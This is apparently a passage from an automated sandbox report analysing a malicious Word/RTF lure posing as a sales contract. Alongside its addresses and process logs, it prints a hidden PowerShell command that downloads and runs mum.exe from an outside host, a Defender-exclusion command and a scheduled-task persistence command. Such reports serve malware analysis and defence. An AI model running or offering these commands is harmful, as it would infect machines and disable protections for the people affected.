Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 34_2_00254E58	34_2_00254E58
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 34_2_0025CE88	34_2_0025CE88
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 34_2_00253E98	34_2_00253E98
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 34_2_0025D2E0	34_2_0025D2E0
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 34_2_002542F9	34_2_002542F9
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 34_2_0025D738	34_2_0025D738
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 34_2_00252F18	34_2_00252F18
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 34_2_00254758	34_2_00254758
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 34_2_0025DB90	34_2_0025DB90
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 34_2_0025DFE8	34_2_0025DFE8
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 34_2_002589C8	34_2_002589C8
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 34_2_002589D8	34_2_002589D8
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 34_2_00251B48	34_2_00251B48
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 34_2_005F1A58	34_2_005F1A58
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 34_2_005F5258	34_2_005F5258
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 34_2_005F0D50	34_2_005F0D50
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 34_2_005FBF50	34_2_005FBF50
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 34_2_005F0048	34_2_005F0048
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 34_2_005F8F78	34_2_005F8F78
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 34_2_005F8270	34_2_005F8270
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 34_2_005F7568	34_2_005F7568
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 34_2_005FAC68	34_2_005FAC68
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 34_2_005F7E18	34_2_005F7E18
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 34_2_005F3810	34_2_005F3810
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 34_2_005F7110	34_2_005F7110
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 34_2_005F1600	34_2_005F1600
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 34_2_005F4500	34_2_005F4500
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 34_2_005FB900	34_2_005FB900
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 34_2_005F6838	34_2_005F6838
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 34_2_005FD238	34_2_005FD238
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 34_2_005F5B30	34_2_005F5B30
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 34_2_005F2D20	34_2_005F2D20
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 34_2_005F8B20	34_2_005F8B20
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 34_2_005FA620	34_2_005FA620
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 34_2_005F56D8	34_2_005F56D8
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 34_2_005F9FD0	34_2_005F9FD0
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 34_2_005F86C8	34_2_005F86C8
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 34_2_005F79C0	34_2_005F79C0
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 34_2_005F08F8	34_2_005F08F8
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 34_2_005FCBF0	34_2_005FCBF0
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 34_2_005F63E0	34_2_005F63E0
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 34_2_005F6C90	34_2_005F6C90
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 34_2_005F5F88	34_2_005F5F88
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 34_2_005F9980	34_2_005F9980
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 34_2_005F1EB0	34_2_005F1EB0
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 34_2_005FB2B0	34_2_005FB2B0
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 34_2_005F11A8	34_2_005F11A8
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 34_2_005F04A0	34_2_005F04A0
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 34_2_005FC5A0	34_2_005FC5A0
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 34_2_005F7558	34_2_005F7558
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 34_2_005F1A4A	34_2_005F1A4A
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 34_2_005F0D41	34_2_005F0D41
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 34_2_005F5F78	34_2_005F5F78
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 34_2_005F8F69	34_2_005F8F69
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 34_2_005F8260	34_2_005F8260
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 34_2_005F8B1A	34_2_005F8B1A
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 34_2_005F2D12	34_2_005F2D12
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 34_2_005FA611	34_2_005FA611
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 34_2_005F7E09	34_2_005F7E09
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 34_2_005F0006	34_2_005F0006
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 34_2_005F7106	34_2_005F7106
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 34_2_005F6828	34_2_005F6828
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 34_2_005F5B20	34_2_005F5B20
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 34_2_005F63D1	34_2_005F63D1
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 34_2_005F56D0	34_2_005F56D0
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 34_2_005F44F2	34_2_005F44F2
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 34_2_005F15F1	34_2_005F15F1
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 34_2_005FB8F1	34_2_005FB8F1
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 34_2_005F08E8	34_2_005F08E8
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 34_2_005F3498	34_2_005F3498
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 34_2_005F1198	34_2_005F1198
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 34_2_005F0490	34_2_005F0490
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 34_2_005F3489	34_2_005F3489
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 34_2_005F6C80	34_2_005F6C80
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 34_2_005F86B8	34_2_005F86B8
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 34_2_005F79B1	34_2_005F79B1
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 34_2_005F1EAA	34_2_005F1EAA

Source: ~WRF{F2385FB8-B924-43C9-BEC5-65FAE5403308}.tmp.0.dr

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: C:\Users\user\AppData\Roaming\mum.exe	Memory allocated: 77620000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Memory allocated: 77740000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Memory allocated: 77620000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Memory allocated: 77740000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Memory allocated: 77620000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Memory allocated: 77740000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Memory allocated: 77620000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\mum.exe	Memory allocated: 77740000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\mum.exe	Memory allocated: 77620000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\mum.exe	Memory allocated: 77740000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\mum.exe	Memory allocated: 77620000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\mum.exe	Memory allocated: 77740000 page execute and read and write

Source: mum[1].exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: mum.exe.4.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: RRUwFfPTEDHYrl.exe.8.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Revised sales contract for Crosswear.rtf

ReversingLabs: Detection: 32%

Source: C:\Users\user\AppData\Roaming\mum.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................p.......#.........-.......j.....p.........j.......e.....`Ig.......bw.....................Kn.....................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....#................Zuk.....~..............................}.dw....8.......0.!..............$n.............p...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w..../.......u.r.i.n.g. .a. .W.e.b.C.l.i.e.n.t. .r.e.q.u.e.s.t..."...p.......0.!.............H$n.....6.......p...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w..../................Zuk....(...............................}.dw............0.!..............$n.............p...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....;.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.7...............}.dw............0.!.............H$n.....".......p...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....;................Zuk....p...............................}.dw............0.!..............$n.............p...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....G...............c]uk.....'n.............................}.dw............0.!.............................p...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....G................Zuk....p...............................}.dw............0.!..............$n.............p...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....S...............c]uk.....'n.............................}.dw....(.......0.!.....................f.......p...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....S................Zuk....................................}.dw....`.......0.!..............$n.............p...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w...._...............c]uk.....'n.............................}.dw.... .......0.!.............................p...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w...._................Zuk....................................}.dw....X.......0.!..............$n.............p...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....k...............c]uk.....'n.............................}.dw............0.!.....................f.......p...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....k................Zuk....H...............................}.dw............0.!..............$n.............p...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................E.......w....... .......c]uk.....'n.............................}.dw....X.......0.!.............H$n.............p...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....w................Zuk....................................}.dw............0.!..............$n.............p...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................#...............(.P.....................l........Z......................0.......#.......................................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................#...............(.P.....................D........Z......................0.......#.......h...............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ......................../...............(.P.....................D........Z......................0......./.........................7.............	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ......................../...............(.P.....................D........[......................0......./.......h...............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................;...............(.P.....................D.......C[......................0.......;...............\|.........7.............	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................;...............(.P.....................D.......`[......................0.......;.......h...............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7........[......................0.......G.......h.......".........7.............	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................G...............(.P.....................D........[......................0.......G.......h.................7.............	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................S...............(.P.....................D........[......................0.......S.........................7.............	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................S...............(.P.....................D........[......................0.......S.......h...............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................_.......E.D.H.Y.r.l...e.x.e.............D........\......................0......._.......h.................7.............	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................_...............(.P.....................D.......6\......................0......._.......h.................7.............	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................k...............(.P.....................D.......^\......................0.......k.........................7.............	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................k...............(.P.....................D.......y\......................0.......k.......h...............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w.......h.......2.........7.............	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................w...............(.P.....................D........\......................0.......w.......h.................7.............	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................D........\......................0.......................l.........7.............	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................D........]......................0...............h...............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ .......(.P.....................D......./]......................0...............h.................7.............	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................D.......L]......................0...............h.................7.............	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Console Write: ................................h.......(.P.....................l.......6Y......................................................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................p.......#.................r.....p.........r.......m.....`Io.......bw.....................Kv.....................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....#...............pV{k....................................}.dw....P.......0...............X `.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w..../.......u.r.i.n.g. .a. .W.e.b.C.l.i.e.n.t. .r.e.q.u.e.s.t..."...........0.................`.....6.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w..../...............pV{k....@...............................}.dw............0...............X `.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....;.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.7...............}.dw............0.................`.....".......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....;...............pV{k....................................}.dw............0...............X `.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....G................W{k.....#`.............................}.dw............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....G...............pV{k....................................}.dw............0...............X `.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....S................W{k.....#`.............................}.dw....@.......0.......................f.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....S...............pV{k....................................}.dw....x.......0...............X `.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w...._................W{k.....#`.............................}.dw....8.......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w...._...............pV{k....................................}.dw....p.......0...............X `.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....k................W{k.....#`.............................}.dw............0.......................f.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....k...............pV{k....`...............................}.dw............0...............X `.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................E.~.....w....... ........W{k.....#`.............................}.dw....p.......0.................`.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....w...............pV{k....(...............................}.dw............0...............X `.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................#...............(.P.....p...............l.......Zr......................0.......#.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................#...............(.P.....p...............l.......{r......................0.......#.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ......................../...............(.P.....p...............l........r......................0......./.......................(...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ......................../...............(.P.....p...............t........r......................0......./.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................;...............(.P.....p...............t........r......................0.......;...............\|.......(...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................;...............(.P.....p...............t........s......................0.......;.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7.......Cs......................0.......G...............".......(...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................G...............(.P.....p...............t.......^s......................0.......G.......................(...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................S...............(.P.....p...............t........s......................0.......S.......................(...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................S...............(.P.....p...............t........s......................0.......S.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................_.......E.D.H.Y.r.l...e.x.e.............t........s......................0......._.......................(...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................_...............(.P.....p...............t........s......................0......._.......................(...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................k...............(.P.....p...............p....... t......................0.......k.......................(...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................k...............(.P.....p...............t.......<t......................0.......k.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w...............2.......(...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................w...............(.P.....p...............p........t......................0.......w.......................(...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....p...............l........t......................0.......................l.......(...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....p...............l........t......................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ .......(.P.....p...............l........t......................0...............................(...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....p...............t........u......................0...............................(...............
Source: C:\Windows\SysWOW64\schtasks.exe	Console Write: ................................E.R.R.O.R.:. ...................l........o........................................%.............................
Source: C:\Windows\SysWOW64\schtasks.exe	Console Write: ................................E.R.R.O.(.P.....................l........o..............................................j.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................#...............(.P.............................).......................0.......#.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................#...............(.P.............................F.......................0.......#.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ......................../...............(.P.............................n.......................0......./.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ......................../...............(.P.....................................................0......./.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................;...............(.P.....................................................0.......;...............\|.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................;...............(.P.....................................................0.......;.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7...............................0.......G...............".......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................G...............(.P.....................................................0.......G.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................S...............(.P.............................;.......................0.......S.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................S...............(.P.............................V.......................0.......S.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................_.......E.D.H.Y.r.l...e.x.e.............................................0......._.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................_...............(.P.....................................................0......._.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................k...............(.P.....................................................0.......k.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................k...............(.P.....................................................0.......k.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w...............2.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................w...............(.P.............................".......................0.......w.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................J.......................0.......................l.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................e.......................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ .......(.P.....................................................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................................................0...............................................
Source: C:\Windows\SysWOW64\schtasks.exe	Console Write: ................................E.R.R.O.R.:. ...................T...............................................8...............................
Source: C:\Windows\SysWOW64\schtasks.exe	Console Write: ................................E.R.R.O.(.P.....................T.......................................................j.......X...............

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://f0705964.xsph.ru/mum.exe','C:\Users\user\AppData\Roaming\mum.exe')
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\mum.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\mum.exe C:\Users\user\AppData\Roaming\mum.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://f0705964.xsph.ru/mum.exe','C:\Users\user\AppData\Roaming\mum.exe')
Source: C:\Users\user\AppData\Roaming\mum.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RRUwFfPTEDHYrl.exe
Source: C:\Users\user\AppData\Roaming\mum.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RRUwFfPTEDHYrl" /XML "C:\Users\user\AppData\Local\Temp\tmpEFF.tmp
Source: C:\Users\user\AppData\Roaming\mum.exe	Process created: C:\Users\user\AppData\Roaming\mum.exe C:\Users\user\AppData\Roaming\mum.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\mum.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://f0705964.xsph.ru/mum.exe','C:\Users\user\AppData\Roaming\mum.exe')
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\mum.exe C:\Users\user\AppData\Roaming\mum.exe
Source: C:\Users\user\AppData\Roaming\mum.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RRUwFfPTEDHYrl.exe
Source: C:\Users\user\AppData\Roaming\mum.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RRUwFfPTEDHYrl" /XML "C:\Users\user\AppData\Local\Temp\tmp430A.tmp
Source: C:\Users\user\AppData\Roaming\mum.exe	Process created: C:\Users\user\AppData\Roaming\mum.exe C:\Users\user\AppData\Roaming\mum.exe
Source: C:\Users\user\AppData\Roaming\mum.exe	Process created: C:\Users\user\AppData\Roaming\mum.exe C:\Users\user\AppData\Roaming\mum.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\mum.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\mum.exe C:\Users\user\AppData\Roaming\mum.exe
Source: C:\Users\user\AppData\Roaming\mum.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RRUwFfPTEDHYrl.exe
Source: C:\Users\user\AppData\Roaming\mum.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RRUwFfPTEDHYrl" /XML "C:\Users\user\AppData\Local\Temp\tmpA5B2.tmp
Source: C:\Users\user\AppData\Roaming\mum.exe	Process created: C:\Users\user\AppData\Roaming\mum.exe C:\Users\user\AppData\Roaming\mum.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\verclsid.exe "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5
